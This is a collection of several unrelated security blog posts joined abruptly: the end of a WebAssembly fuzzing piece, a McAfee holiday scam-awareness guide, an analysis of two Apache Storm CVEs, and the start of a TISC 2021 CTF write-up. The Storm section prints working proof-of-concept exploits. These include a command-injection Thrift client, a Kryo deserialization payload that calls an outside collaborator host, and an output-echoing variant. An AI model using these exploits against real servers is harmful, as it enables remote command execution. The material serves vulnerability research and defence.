For that to work, you need the following .wasm file:
So if the JavaScript is looking for a main function, you should have a main function inside your .wasm module. Also, as we mentioned, there are many things to check, like import/export tables, import/export buffers, functions, and global variables. We'll have to combine many of them together, but some of them we couldn't, like tables: you can only have one in your program, either exported or imported. That said, we had to separate them into different modules and avoid some of them to reduce complexity.
After finishing our first version, we went to the Chromium bug tracker, which turned out to be a great place to expand our logic and find smarter, more complex tips and tricks. We used some of the snippets there as-is, and some of them with little modification. It's also worth mentioning that when you search, you should apply the filter related to your area of interest. In our case, we looked into all bugs with Type 'Bug-Security' and component Blink>JavaScript>WebAssembly; you can use this line on the search bar.
While we were reading these issues on the bug tracker, we found this bug that could be produced by our Dharma logic (if we were a bit faster xD)
WebAssembly Module
Now that we're done fuzzing the first two components, we can move on to the last component of WebAssembly, which is the module.
Everything that we did earlier was related to fuzzing the APIs and JavaScript's grammar, but we found two interesting functions used to compile a module and ensure its validity: the compile and validate functions. Both of these functions receive a .wasm module. The first function compiles WebAssembly binary code into a WebAssembly module; the second returns whether the bytes from a .wasm module are valid (true) or not (false).
For both compile and validate, we made a .wasm corpus (by building or collecting), then we used Radamsa to mutate the binary content of these files before importing them from our two functions.
We improved the mutation by skipping the first part of the .wasm module, which contains the header of the file (magic number and version), and mutating the actual instructions instead.
Stay tuned for the final part of our Dharma blog series, where we implement more advanced grammar files. Happy Hunting!!
‘Tis the Season for Scams
Co-authored by: Sriram P and Deepak Setty
‘Tis the season for scams. Well, honestly, it’s always scam season somewhere. In 2020, the Internet Crime Complaint Center (IC3) reported losses in excess of $4.1 billion to scams, a 69% increase over 2019. There is no better time for a scammer celebration than Black Friday, Cyber Monday, and the lead-up to Christmas and New Year. It’s a predictable time of the year, which gives scammers ample time to plan and organize. The recipe isn’t complicated: at the base we have some holiday excitement, sprinkle in fake shopping deals, add some discounts, and ho ho ho, we have social engineering scams.
In this blog, we want to increase awareness related to scams, as we expect elevated activity during this holiday season. The techniques used to scam folks are very similar to those used to spread malware, so always be alert and use caution when browsing and shopping online. We will provide some examples to help educate consumers on how to identify scams. The victims of such scams can also be others around you, like your kids or parents, so read up and spread the word with family and friends. Awareness, education, and being alert are key to keeping fraudsters at bay.
Relevant scams this season
Although there is a myriad of scams out there, we expect the most common scams and targets this season to be:
- Non-delivery scams – Fake online stores will attempt to get you to purchase items that you will never end up receiving
- Deals that get shoppers excited – recent supply chain issues give scammers more fodder to place bait deals on popular items
- Elderly parents/grandparents looking for cheap medical equipment, medical memberships, or looking to purchase and ship their grandchildren presents for the holidays.
- Emotionally vulnerable people might fall prey to romance scams
- Children looking for free Fortnite V-Bucks and other gaming credits may fall prey to scams and could even get infected with potentially unwanted programs
- Charity scams will be rampant.
SMSishing, email-based Phishing, and push notifications will be the most common vectors initiating scams during this holiday season. Here are some common tactics in use today:
1. Unbelievable deals or discounts
This is a common theme around this time of the year. Deals, discounts, and gift cards can be costly to your bank account. Be wary of URLs being presented to you over email or SMS. Phishing emails, bulk mailing, texting, and typo-squatting are some of the ways that scammers target their prey.
2. Creating a sense of urgency
Scammers will create a sense of urgency by telling you that you have limited time to claim the deal or that there is low inventory for popular items in their store. It’s not difficult for scammers to identify sought-after electronics items or holiday gifts for sale and offer them for sale on their fake stores. Such scams are believable given the supply chain challenges and delivery shortages over the last few months.
3. Utilizing Scare tactics
Getting people worried about a life-changing event or disrupting travel plans can be concerning. So, if you get an unexpected call from someone claiming to be from the FBI, police, IRS, or even a travel company, stop and think. They may be using scare tactics to dupe you. Never divulge personal information and if in doubt, ask them a lot of directed questions and fact check them. As an example, check to see if they know your home address, account number, itinerary number, or bank balance depending on who they claim to be. Scammers typically don’t have specific details and when put on the spot, they’ll hang up.
4. Emotional tactics
Like scare tactics, scammers may prey on vulnerable people. Although there can be many variations of such scams, the more common ones are Romance Scams where you end up connecting to someone with a fake profile, and Fake Charity Scams where you receive a phone call or an email requesting a donation. Do not entertain such requests over the phone especially if you receive a phone call soliciting a donation. During the conversation, they will attempt to make you feel guilty or selfish for not contributing enough. Remember, there is no rush to donate. Go to a reputable website or a known organization and donate if you must after due diligence.
Tips to identify a scam
Successful scams are situationally accurate. You may be the smartest guy in the room, but when you're eagerly waiting for a delivery and you see an email claiming a delivery delay from UPS, you might fall for a scam. This is particularly true in the holiday season, and therefore such themes are more prevalent. Here are some tips on how to identify scams early on.
- Be suspicious of anything that is pushed to you from an unknown source – emails, SMS, advertisements, phone calls, surveys, social media. This is when you are being solicited to do something you might not have otherwise chosen to do
- Avoid going to unknown websites to begin with. You always have the option to research a link before you click on it. You can use some of the following trusted free resources to validate a domain or business:
- https://trustedsource.org/ – to look up a URL
- https://www.virustotal.com/gui/home/url – to look up a URL
- https://www.bbb.org/ – to validate a business, charity, etc
- https://whois.domaintools.com/ – to look up site history. A new or recent domain is less trustworthy. Scammers register new domains based on the theme of their scams.
- If you do end up navigating, look for the following to build trust in a link:
- Ensure it's an "https" domain versus an "http". A valid "https" certificate only means that your data is encrypted en route to the website, so it isn't proof of legitimacy on its own, but some scams are hosted on compromised "http" sites. (Example 1)
- Look closely at the domain name; small differences can be indicative of fakes. Scammers typically register domains with very similar names to deceive you. For example, Amazon.com could be replaced by Arnazon.com or AMAZ0N.com: 'w' might be replaced with 'vv', 'l' with a '1', and so on. The same goes for emails you receive – take a close look.
- Another common way of reaching a fake website is "typosquatting", though this is typically human error: a user types an incorrect domain name and lands on a fake site.
- Most legit sites will have a “Contact us”, “About Us”, “Conditions of Use”, “Privacy Notice”/”Terms”, “Help”, Social Media presence on Twitter, FB, Instagram, etc. Read up on the pages to learn about the website and even look for website reviews before you make a purchase. Fake websites do not invest a lot of time to populate these – this could be a giveaway.
- Always confirm the sender of an email or text by validating the email address or phone number. For example, if an email claims to be from Bank of America, you would expect its email domain in most cases to be "@bankofamerica.com" and not "@gmail.com". Avoid clicking on links from emails or messages when you don't know the sender.
- If you end up linking to a page because of an email or message, never provide personal details. Any site asking for such information should raise red flags. Even if the site looks legit, Phishing scammers make exact replicas of web pages and try to get you to login. This allows them to steal your login credentials. (Example 4)
- Don't feel pressured to click on a link or provide details to solicitors. Any attempt to gather personal data is a big NO.
- Never open attachments from unknown people. Emails with document attachments or PDF Attachments are very popular in spreading malware. The attachment names are typically very enticing to click on. Names like “invoice.pdf”, “receipt.doc”, “Covid-19 test results.doc”, etc. may invite some curiosity but could also lead to malware.
- Ensure you review a hyperlink before you click it. It's easy to fake the link text and route you to an illegitimate page (Example 2).
- Anyone who insists on payments using a pre-paid gift card or wire transfer, instead of your typical credit card is most likely attempting to scam you.
- The end goal of a scammer is that they want to make money – so be alert with your cards and their activity.
- Avoid using Debit Cards online. Use a prepaid or virtual Credit Card or even better utilize Apple Pay, Google Pay or PayPal for online payments. Payment card services today have advanced fraud monitoring systems
- Check CC statements often to look for any unanticipated charges.
- If you make a purchase, ensure you have a tracking number and monitor shipments
- Disable international purchases if you know you won’t be traveling.
- Never wire money directly to anyone you do not know.
What if you are a victim?
If you believe that you have been a victim of a scam, here are a few tips that might help.
- First, get in touch with your credit card company and ask them to put a hold on your card. You can dispute any suspicious charges and request a chargeback.
- If you have been scammed through popular sites like ebay.com or amazon.com – contact them directly. If you wired money, contact the wire company directly
- File a Police Report. If you gave your personal information away, you might want to go to
- Notify and contribute – build awareness
Example scams:
Example 1: Fake SMS messages
It's become more common recently to receive text messages from scammers. The following text messages demonstrate SMSishing attempts.
- The first is an attempt to gather Bank of America details. For the scammer, it's a shot in the dark: given that the target is a US number, he uses the phone number he is texting as a supposed bank account number and provides a link to a bit.ly page (a URL shortening service) leading to a fake page that poses as a Bank of America login. The SMSishing attempt succeeds if the victim enters their details.
2. The following are fake texts that attempt to entice you to click the link, with a gift card as bait. One can tell they belong to the same campaign since they originate from fake phone numbers that are very similar but not identical. The domain names of the two URLs are totally random (probably compromised URLs). Back in October, the full-URL SMSishing attempts were not very effective, which is probably why in November they embedded keywords like "COSTCO" and "ebay" within the URL and inline in the SMS text, making people more likely to click.
Also note that some of the URLs only use "http" rather than "https", something noted earlier in this blog.
Example 2: Fake email link
One cannot trust an email by its text alone. You should review the link to ensure it takes you where it claims to. The following is an example email where the link is not what it claims to be.
Example 3: Fake Store Scam hosted on Shopify
Shopify is a Canadian multinational e-commerce company. It offers online retailers a suite of services, including payments, marketing, shipping, and customer engagement tools.
So, where there is money to be made, individuals are looking to take advantage. Shopify scams target both consumers and business owners. Scammers abuse the reach of e-commerce to earn money by setting up fake stores: they pick a product or category, create an attractive logo or image, and promote it extensively on social media.
Fake Bike Online Purchase store – Mountain-ranger-com
Site: hxxps://mountain-ranger-com.myshopify.com/collections/all
SSL info:
This site is hosted on Shopify, so it has a valid SSL certificate – the first thing most of us check before transacting on a site.
Whois Record ( last updated on 2021-11-19 )
Domain Name: myshopify.com
Registry Domain ID: 362759365_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2021-03-02T23:39:12+0000
Creation Date: 2006-03-03T03:01:37+0000
Registrar Registration Expiration Date: 2024-03-02T08:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.2083895770
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registrant Organization: Shopify Inc.
Registrant State/Province: ON
Registrant Country: CA
Registrant Email:
The registrar info for the site is valid too, as it is hosted on Shopify. Look closer, however, and you will notice red flags:
- Compare the prices with those on known sites like Amazon: the price listed on the fake site versus the price listed on Amazon. This is an "unbelievable" deal.
Examples of similar sites showing incredible discounts.
2. The “About Us” doesn’t make much sense when you see the products that are being offered:
A quick Google search of the text shows that multiple sites are using the same exact text (most of them probably fake).
3. There are no customer reviews about the products listed.
4. It has a public email provider (Gmail) in its return policy.
5. Looking up the listed address in Google Maps turns up nothing, and looking up the number in apps like Truecaller shows it's fake.
Example 4: Social Engineering to Steal Credentials
The goal of this scam is to steal credentials, though it could just as well be used as a malware delivery mechanism. The screenshot is of a fake business proposal hosted on OneDrive for phishing purposes.
The actor aims to mislead the user into clicking on the above reference link. When the user clicks on the link, it redirects to a different website that displays the below fake OneDrive screenshot.
hxxps://aidaccounts[.]com/11/verified/22/
If a user enters their OneDrive details, the actors receive them at their backend. This means that this victim has lost their login credentials to the phishing actors. Look at the address bar and trust your instincts. This is in no way related to Microsoft OneDrive. There are other such examples where they do some additional plumbing of the URL to include keywords that make it more believable – as they did in the SMSishing example above.
Example 5: Fake Push Notification for surveys
The goal here is to get the user to accept push notifications. Doing so makes the customer susceptible to other possible scams. In this example, the scammers attempt to get users to fill out surveys. Legit companies online pay users for surveys. A referral code is used to pay the survey taker. The scammer in this case attempts to get others to fill the survey on their behalf and therefore makes money when such surveys use the scammer’s referral code. Push notifications are used to get the victims to fill out surveys. Previous blogs from McAfee demonstrate similar scams and how to prevent such notifications
The initial vector comes to the victim via a spam email with a PDF Spam attachment. In this scenario, Gmail was used as the sender.
Upon opening the PDF, a fake online PUBG (PlayerUnknown's Battlegrounds) credits generator opens. In PUBG, gamers need credits to participate in various online games, so this scam baits them with free credits.
Once the user clicks on the bait URL, it opens a google feed proxy URL.
Malicious websites are quickly block-listed and therefore have short shelf lives. The Google feed proxy redirect helps the scammers adapt to new URLs, serving as a fast-flux-style mechanism to keep the campaign alive. Use of feed proxies is not new; we have highlighted their use in the past by the Hancitor botnet.
Clicking the top highlighted URL navigates to a webpage that poses as a PUBG Arcane online credit generator.
To make the online generator look real, the website has added fake recent activities highlighting coins users have earned via this generator. Even the comments section is fake.
Clicking on continue brings up a fake progress bar. The site then shows that the coins and cash are ready; however, an automated human verification has failed, and a survey must be completed to get the reward.
A clickable link for this verification is also loaded. Once clicked, a small dialog with 3 options is presented.
Clicking on "want to become a millionaire" loads a survey page and prompts you to take it. It will also prompt you to allow push notifications from the website.
Once you click on "Allow", notifications to take a survey or fake personalized offers start popping up. Be it on your desktop or on your mobile, these notifications keep appearing, urging you to take more surveys.
Clicking the other links from "Human Verification" leads to the same realization: you end up gaining nothing for your PUBG Arcane gaming and simply taking surveys.
Here is another example of a PDF theme we have seen used as a lure: a Lenovo tablet offer.
Clicking on this link takes the user to a page that claims to be protected by a bot-blocking technique, persuading you to click the allow button to enable popups.
Once you click on the enable button, it then redirects the browser to take up a random survey. In our case, the survey was on household income.
Another such theme we observed was around the latest Netflix series, Squid Game. Although only Season 1 has been released, the fake email promises early access to Season 2.
Scammers spend a lot of time and effort tweaking and tuning their schemes to make them fit just right for you. Avoiding scams is not foolproof, but vigilance is key. Don't get overly keen when offers are thrown at you this season. Take a step back, relax and think it through; do your own research, and trust your instincts. Spending a little extra on products, or donating to a reputable and known organization, might be worth the peace of mind during the holidays. Help educate your family and contribute by reporting scams.
Happy Holidays!
The post ‘Tis the Season for Scams appeared first on McAfee Blog.
Apache Storm Vulnerability Analysis
Author: 0x28
0x00 Introduction
Apache Storm recently published two CVEs. Brief analyses already exist in the advisories below; this article supplements them.
GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865
GHSL-2021-085: Command injection in Apache Storm Nimbus - CVE-2021-38294
0x01 Vulnerability Analysis
CVE-2021-38294 affects versions 1.x–1.2.3 and 2.0.0–2.2.0
CVE-2021-40865 affects versions 1.x–1.2.3, 2.1.0 and 2.2.0
CVE-2021-38294
1. Patch details
For the CVE-2021-38294 command injection vulnerability, the official patch is https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-30ba43eb15432ba1704c2ed522d03d588a78560fb1830b831683d066c5d11425
The patch removes the old pattern of executing the command line by concatenating the user value into a bash -c string; instead, each element is passed directly as an array entry, so even if user contains injected commands they are never executed – the user value simply becomes an argument to the id command. Where this is invoked in the ShellUtils class, the user parameter is attacker-controlled.
So if the user parameter is ";whoami;", the String array produced by getGroupsForUserCommand after concatenation is
new String[]{"bash","-c","id -gn ; whoami;&& id -Gn; whoami;"}
The execCommand method actually runs the command; its underlying implementation uses ProcessBuilder to execute system commands, so when this String array is passed in, bash executes the shell command. Because the shell command is user-controlled, arbitrary malicious commands can be executed.
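The argv distinction behind the patch can be illustrated with a short Python sketch (the variable names here are illustrative, not Storm's API): when the attacker-controlled value is spliced into a single bash -c string, the shell parses its metacharacters; when it is a discrete argv element, they stay inert.

```python
evil_user = "foo;touch /tmp/pwned;id "

# Pre-patch shape: user is concatenated into one "bash -c" command line,
# so bash parses the embedded ';' separators as command boundaries.
vulnerable_argv = ["bash", "-c", "id -gn " + evil_user + "&& id -Gn " + evil_user]

# Post-patch shape: user is a single argv element that is never
# shell-parsed, so the metacharacters are just bytes in one argument.
patched_argv = ["id", "-Gn", evil_user]

assert ";touch /tmp/pwned;" in vulnerable_argv[2]  # reaches bash for parsing
assert patched_argv[2] == evil_user                # stays one opaque argument
```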
2. execCommand execution details
Following on from the previous section, let's trace the command execution function. ShellCommandRunnerImpl.execCommand() is implemented as follows
The call chain after execute() is execute() -> ShellUtils.run() -> ShellUtils.runCommand()
which finally passes in the shell command and invokes ProcessBuilder to execute it.
3. Call stack details
In the PoC the author provides the call stack captured while debugging.
getGroupsForUserCommand:124, ShellUtils (org.apache.storm.utils)
getUnixGroups:110, ShellBasedGroupsMapping (org.apache.storm.security.auth)
getGroups:77, ShellBasedGroupsMapping (org.apache.storm.security.auth)
userGroups:2832, Nimbus (org.apache.storm.daemon.nimbus)
isUserPartOf:2845, Nimbus (org.apache.storm.daemon.nimbus)
getTopologyHistory:4607, Nimbus (org.apache.storm.daemon.nimbus)
getResult:4701, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)
getResult:4680, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)
process:38, ProcessFunction (org.apache.storm.thrift)
process:38, TBaseProcessor (org.apache.storm.thrift)
process:172, SimpleTransportPlugin$SimpleWrapProcessor (org.apache.storm.security.auth)
invoke:524, AbstractNonblockingServer$FrameBuffer (org.apache.storm.thrift.server)
run:18, Invocation (org.apache.storm.thrift.server)
runWorker:-1, ThreadPoolExecutor (java.util.concurrent)
run:-1, ThreadPoolExecutor$Worker (java.util.concurrent)
run:-1, Thread (java.lang)
Working from this call stack, the vulnerable code in getGroupsForUserCommand can only be traced back as far as nimbus.getTopologyHistory(), so it is not obvious how the author determined which service and port this interface belongs to. Presumably the author went through a lot of documentation and test cases to work out how the interface is invoked remotely, and on which port.
Searching the codebase for port 6627 shows it being set as a default value in one class. Combining that with a careful read of Nimbus.java, my rough analysis of the question above is as follows.
I divide Nimbus service startup into two steps: first, read the configuration to obtain the port; second, open that port and bind the corresponding service to it.
During startup, /bin/storm and storm.py load the Nimbus class. Inside Nimbus, the path is main() -> launch() -> launchServer(). launchServer first instantiates a Nimbus object; the Nimbus constructor runs and loads the port configuration. A ThriftServer is then instantiated and bound to the nimbus object, and after initialization its serve() method is called to receive incoming data.
The Nimbus constructor chains through several overloads via this
The last overload calls fromConf to load the configuration and assigns the result to nimbusHostPortInfo
fromConf is implemented as follows; the port is simply defaulted to 6627
Back on the main path, server.serve() starts accepting requests
At this point the picture for port 6627 is mostly clear: because the Nimbus object is bound to port 6627, getTopologyHistory can be invoked remotely through that port.
4. Constructing the PoC
From the analysis above, it is enough to connect to port 6627 and send the right payload. Having identified the vulnerable service on port 6627, the test cases in the source tree make for quick experiments, avoiding the need to trawl documentation to build a PoC. The official PoC is as follows
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class ThriftClient {
    public static void main(String[] args) throws Exception {
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);
        // send attack
        nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/pwned;id ");
    }
}
The test class org/apache/storm/nimbus/NimbusHeartbeatsPressureTest.java contains the following test code against port 6627
Instantiation requires the configuration parameters plus the remote address and port. The configuration parameters are listed below, so constructing a config map is all that is needed.
Methods are then invoked through getClient().xxx(), e.g. the call to sendSupervisorWorkerHeartbeats in the figure below
Like getTopologyHistory, that method is a member of the Nimbus class, so the same technique works for invoking getTopologyHistory remotely.
CVE-2021-40865
1. Patch details
For CVE-2021-40865, the official patch adds a validation step before incoming data is deserialized when validation is not enabled by the default configuration (https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-463899a7e386ae4ae789fb82786aff023885cd289c96af34f4d02df490f92aa2); in other words, validation is now on by default.
From the documentation, the channelActive method performs this validation when a connection is established
In the old code, channelActive did no login validation, and the patch itself makes clear that this is a deserialization vulnerability. The deserialization logic lives in StormClientPipelineFactory.java; because there is no login validation, the flaw can be combined with a deserialization gadget to execute system commands.
2. Deserialization details
In StormClientPipelineFactory.java, incoming data passes through decoders before it is processed: MessageCoder together with KryoValuesDeserializer. KryoValuesDeserializer first builds the deserializer, and decoding is then performed by MessageDecoder
Decoding ultimately lands in MessageDecoder.decode(). Inside the decode logic the author crafts fake data that walks cleanly to the final deserialization point. First, two bytes are read as a short into the code variable
If code equals -600, the next four bytes are read as the length of the remaining data, and those remaining bytes are passed to BackPressureStatus.read()
whose read method deserializes the supplied bytes
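The framing check can be mimicked with a small Python stand-in (a simplified sketch, not Storm's actual MessageDecoder code): a big-endian short code of -600, a 4-byte length, then the bytes handed to the deserializer.

```python
import struct

def decode_frame(buf: bytes) -> bytes:
    # First 2 bytes: short "code"; only -600 frames reach BackPressureStatus.read()
    code, = struct.unpack_from(">h", buf, 0)
    if code != -600:
        raise ValueError("not a BackPressureStatus frame")
    # Next 4 bytes: length of the serialized payload
    length, = struct.unpack_from(">i", buf, 2)
    # Remaining bytes: what the vulnerable code deserializes
    return buf[6:6 + length]

frame = struct.pack(">hi", -600, 5) + b"kryo!"
assert decode_frame(frame) == b"kryo!"
```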
3. Call stack details
Tracing back up through the code to find the port this service listens on:
Server.java - new Server(topoConf, port, cb, newConnectionResponse);
WorkerState.java - this.mqContext.bind(topologyId, port, cb, newConnectionResponse);
Worker.java - loadWorker(IStateStorage stateStorage, IStormClusterState stormClusterState,Map<String, String> initCreds, Credentials initialCredentials)
LocalContainerLauncher.java - launchContainer(int port, LocalAssignment assignment, LocalState state)
Slot.java - run()
ReadClusterState.java - ReadClusterState()
Supervisor.java - launch()
Supervisor.java - launchDaemon()
Supervisor.java first instantiates Supervisor, loading the configuration file during construction (storm.yaml configures port 6700), and then calls launchDaemon to start the service
Reading the configuration starts with a call to ConfigUtils.readStormConfig()
ConfigUtils.readStormConfig() -> ConfigUtils.readStormConfigImpl() -> Utils.readFromConfig()
which in turn calls findAndReadConfigFile to read storm.yaml
Once the configuration is read, launchDaemon is entered and calls launch
launch instantiates ReadClusterState
The ReadClusterState constructor calls slot.start() for each slot, entering Slot's run method, which eventually invokes LocalContainerLauncher.launchContainer() with the port and other configuration, and finally new Server(topoConf, port, cb, newConnectionResponse) listens on the port and binds the handler.
4. Constructing the PoC
import org.apache.commons.io.IOUtils;
import org.apache.storm.serialization.KryoValuesSerializer;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.URLDNS;
import java.io.*;
import java.math.BigInteger;
import java.net.*;
import java.util.HashMap;
public class NettyExploit {

    /**
     * Encoded as -600 ... short(2) len ... int(4) payload ... byte[]
     */
    public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
        byte[] payload = ser.serializeObject(obj);
        BigInteger codeInt = BigInteger.valueOf(-600);
        byte[] code = codeInt.toByteArray();
        BigInteger lengthInt = BigInteger.valueOf(payload.length);
        byte[] length = lengthInt.toByteArray();
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        outputStream.write(code);
        outputStream.write(new byte[] {0, 0});
        outputStream.write(length);
        outputStream.write(payload);
        return outputStream.toByteArray();
    }

    public static KryoValuesSerializer getSerializer() throws MalformedURLException {
        HashMap<String, Object> conf = new HashMap<>();
        conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
        conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
        conf.put("topology.skip.missing.kryo.registrations", false);
        conf.put("topology.fall.back.on.java.serialization", true);
        return new KryoValuesSerializer(conf);
    }

    public static void main(String[] args) {
        try {
            // Payload construction
            String command = "http://k6r17p7xvz8a7wj638bqj6dydpji77.burpcollaborator.net";
            ObjectPayload gadget = URLDNS.class.newInstance();
            Object payload = gadget.getObject(command);
            // Kryo serialization
            byte[] bytes = buffer(getSerializer(), payload);
            // Send bytes
            Socket socket = new Socket("127.0.0.1", 6700);
            OutputStream outputStream = socket.getOutputStream();
            outputStream.write(bytes);
            outputStream.flush();
            outputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
What sets this deserialization PoC apart is the prefix data that must be constructed so that the serialized bytes actually reach the deserialization method: first the two-byte value -600, then a four-byte value holding the length of the serialized data, followed by the serialized data itself produced with Storm's own serializer; send all of this to the server.
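For payloads between 256 and 32767 bytes, the two literal zero bytes plus BigInteger's two-byte length representation in the PoC's buffer() method amount to a single 4-byte big-endian length field, so the prefix can be cross-checked in Python with one struct.pack call (a sketch under that size assumption):

```python
import struct

payload = b"\x00" * 1234  # stand-in for the Kryo-serialized gadget bytes

# 2-byte big-endian code (-600), 4-byte big-endian length, then the payload
frame = struct.pack(">hi", -600, len(payload)) + payload

assert frame[:2] == b"\xfd\xa8"                 # -600 as a big-endian short
assert frame[2:6] == (1234).to_bytes(4, "big")  # 4-byte length field
```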
0x02 Reproduction & Output-Echoing Exploits
CVE-2021-38294
Reproduction is as follows.
After some debugging of the exploit: since this is direct command execution, the simplest approach is to redirect the command output into a .js file that did not previously exist (it is created by the executed command) and then fetch that js from the web UI.
import com.github.kevinsawicki.http.HttpRequest;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.thrift.TException;
import org.apache.storm.thrift.transport.TTransportException;
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class CVE_2021_38294_ECHO {
    public static void main(String[] args) throws Exception, AuthorizationException {
        String command = "ifconfig";
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);
        nimbusClient.getClient().getTopologyHistory("foo;" + command + "> ../public/js/log.min.js; id");
        String response = HttpRequest.get("http://127.0.0.1:8082/js/log.min.js").body();
        System.out.println(response);
    }
}
CVE-2021-40865
Reproduction is as follows.
There is currently no usable gadget available to pair with this deserialization for RCE.
0x03 Closing Notes
Because the debugging environment refused to come up during this analysis, everything here is static code analysis; there may be omissions or mistakes, and I would appreciate corrections from fellow researchers.
0x04 References
https://www.w3cschool.cn/apache_storm/apache_storm_installation.html
https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/
https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/
https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
https://github.com/frohoff/ysoserial
The InfoSecurity Challenge 2021 Full Writeup: Battle Royale for $30k
Introduction
From 29 October to 14 November 2021, the Centre for Strategic Infocomm Technologies (CSIT) ran The InfoSecurity Challenge (TISC), an individual competition consisting of 10 levels that tested participants' cybersecurity and programming skills. This format created a big departure from last year's iteration (you can read my writeup here), which was a timed 48 hour challenge focused primarily on reverse engineering and binary exploitation.
Now with two weeks and 10 levels, the difficulty and variety of the challenges greatly increased. As you would expect, the prize pool grew accordingly – instead of $3,000 in vouchers in 2020, it was now $30,000 in cold hard cash. Participants unlocked the prize money in increments of $10,000 from level 8 to 10, with successful solvers splitting the pool equally. For example, if there was only one solver for level 10, they would claim the full $10,000 for themselves.
Hmm... why does this sound so familiar?
However, since I was playing for charity, I was more interested in testing my skills, particularly in the binary exploitation domain. I placed 6th in the previous TISC and wanted to see what difference a year of learning had made.
I spent more than a hundred hours cracking my head against seemingly impossible tasks ranging from web, mobile, steganography, binary exploitation, custom shellcoding, cryptography and more. Levels 8 to 10 combined multiple domains and each one felt like a mini-CTF. While I considered myself reasonably proficient in web, I stepped way out of my comfort zone tackling the broad array of domains, especially as an absolute beginner in pwn, forensics, and steganography. Since I could only unlock each level by completing the previous one, I forced myself to learn new techniques every time.
I took away important lessons for both CTFs and day-to-day red teaming that I hope others will find useful as well. What distinguished TISC from typical CTFs was its dual emphasis on hacking AND programming – rather than exploiting a single vulnerability, I often needed to automate exploits thousands of times. You'll see what I mean soon.
Let's dive into the challenges. You may want to skip the earlier levels as they were fairly basic. You should definitely read levels 8-10, but honestly every challenge from level 3 onwards is interesting.
- Introduction
- Level 1: Scratching the Surface
- Level 2: Dee Na Saw as a need
- Level 3: Needle in a Greystack
- Level 4: The Magician's Den
- Level 5: Need for Speed
- Level 6: Knock Knock, Who's There
- Level 7: The Secret
- Level 8: Get-Shwifty
- Level 9: 1865 Text Adventure
- Level 10: Malware for UwU
- Conclusion
Level 1: Scratching the Surface
I warmed up on basic forensics and steganography challenges.
Part 1
Domains: Forensics
We've sent the following secret message on a secret channel.
Submit your flag in this format: TISC{decoded message in lower case}
file1.wav
The phrase “secret channel” suggested data smuggling via an audio channel, a common steganography technique. file1.wav played a cheery tune that I could not recognise. I quickly applied common tools and techniques like binwalk as described in this Medium article but found nothing. I even tried XORing both channels:
import wave
import struct
wav = wave.open("file1.wav", mode='rb')
frame_bytes = bytearray(list(wav.readframes(wav.getnframes())))
shorts = struct.unpack('H'*(len(frame_bytes)//2), frame_bytes)
shorts_three = struct.unpack_from('H'*(len(frame_bytes)//4), frame_bytes)  # unpack_from tolerates a format shorter than the buffer
extracted_left = shorts[::2]
extracted_right = shorts[1::2]
print(len(extracted_left))
print(len(extracted_right))
extracted_secret = shorts[2::3]
print(len(extracted_secret))
extractedLSB = ""
for i in range(0, len(extracted_left)):
    extractedLSB += str((extracted_left[i] & 1) ^ (extracted_right[i] & 1))
string_blocks = (extractedLSB[i:i+8] for i in range(0, len(extractedLSB), 8))
decoded = ''.join(chr(int(char, 2)) for char in string_blocks)
print(decoded[0:500])
wav.close()
Slightly panicking at this simple challenge, I returned to the “secret channel” hint. I separated each audio channel from the file with a command from Stack Overflow: ffmpeg -i file1.wav -map_channel 0.0.0 ch0.wav -map_channel 0.0.1 ch1.wav. I played ch1.wav and instead of funky music, I heard a series of beeps – Morse code! I used an online Morse code audio decoder and got the flag.
TISC{csitislocatedinsciencepark}
Part 2
Domains: Forensics
